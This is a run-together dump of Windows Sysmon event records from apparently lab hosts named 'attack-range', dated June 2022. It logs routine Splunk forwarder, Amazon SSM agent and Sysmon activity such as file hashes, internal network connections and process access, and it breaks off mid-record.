23542300x800000000000000044982Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:42.878{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFA8FC021D28DF6FB2CB3ED7F274A4C7,SHA256=190D8F8E15334204063E47824D620093CFF88877DC962D9B9E63B0CC4A4A9A52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044984Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:43.968{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CA9883A123D29C4302027EAED658BAF,SHA256=E6B5A20A8ACF0A3DEE369E9AD6B83A51702E5B14C34733693C5C3A865E3C28C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:43.385{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:43.285{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B6FEAA5884C39F885DF5B0061C29501,SHA256=6FCC343E511799F35DC90D0BB395EA35584804A7A140F45110358FF947FCB947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044983Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:43.836{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\respondent-20220603103302-223MD5=1368864ED3964BDCAF310770CE48D2A5,SHA256=F4EE2B140FD43EB5772AE1FE5CF5CF61204868E3BB74D3908306C7C1A703C3E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:44.317{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE5ED5DFE2FD2ABADF69EBF872C92C6,SHA256=5B06B972CCA9060158FF98B6DFD89A61F87649E306FAC8F42F50B6D709803668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044985Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:44.844{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\surveyor-20220603103300-224MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:45.453{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5DB5C606810A32ED0A1242D003001F1,SHA256=D09A048AA03C177F9C5D70FF5AF836D944209C354CBE494A00496E774C452E58,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:42.980{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56440-false10.0.1.12-8089- 354300x800000000000000044987Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:42.756{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52399-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044986Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:45.060{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44E712420D755C77270B3B4CB1A5203C,SHA256=161A28B95604D4D82FCC903FD8C29554874B421B70F87210A600B57DCA3DEBAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:46.468{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3271BB9C22B18C0F2B6B48961ECE5EED,SHA256=C38F0F28BD6B815ED780E629A5F97B5F52C452146387FC62006575FD6A3930B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:44.727{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56441-false10.0.1.12-8000- 23542300x800000000000000044988Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:46.171{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=115D489C00AEEA993E8E190ECF616174,SHA256=BEE10F9D7F4553CA8599F013C94731712BB4B98243DCF4D15CE1A5410CE22C71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:47.517{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09150A172B9AE1815FFAE48691982A82,SHA256=D2DC7290C9D960652EDFB9EDB1A7DEDEA020F403B4E6D678123DFE9F3DF4EFCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045002Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1937-629A-3707-000000006002}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045001Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045000Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044999Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044998Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044997Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044996Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044995Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044994Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044993Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044992Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-1937-629A-3707-000000006002}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044991Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.733{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1937-629A-3707-000000006002}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044990Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.734{0A5DF930-1937-629A-3707-000000006002}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044989Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:47.265{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13D82E685FA75011FA1B49BF0B710F23,SHA256=16AE7F67EE46B8E10F3CCBBED298A3222AD6E77A72867CF1BE2FA246B5C6B1F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:47.216{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=73758F40877D0752158ECF2CF67B8A9B,SHA256=E58356C503593222B7BA3A5E9BC95CAC07AEBB25A4B5BC084BEEBC4A00E587A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.616{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1F0F6192719578D0504ECB61B5CC2C6,SHA256=80A5A7B4A96BA85A82D00E85755E1A967CC4F3127F3AFB462AAF05EC554768E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045018Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.780{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A52125E9775439D4D5AE51468CB61941,SHA256=F09F35E46F5CCA707AC26A4F81CF0A9D564281EBA65D679BB09B2903DDC8A986,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045017Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.562{0A5DF930-1938-629A-3807-000000006002}3116716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045016Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1938-629A-3807-000000006002}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045015Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045014Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.405{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045013Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 